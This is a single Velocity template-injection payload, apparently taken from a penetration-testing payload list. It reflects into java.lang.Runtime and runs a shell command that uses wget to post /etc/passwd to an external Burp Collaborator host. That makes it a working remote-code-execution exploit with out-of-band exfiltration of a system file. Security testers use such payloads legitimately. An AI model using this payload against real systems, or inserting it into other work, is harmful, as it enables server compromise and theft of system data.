#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec('wget --post-file /etc/passwd http://v3zeevzehdivsfrfotjqrnylqcw2kr.burpcollaborator.net/rcetest?a=a')
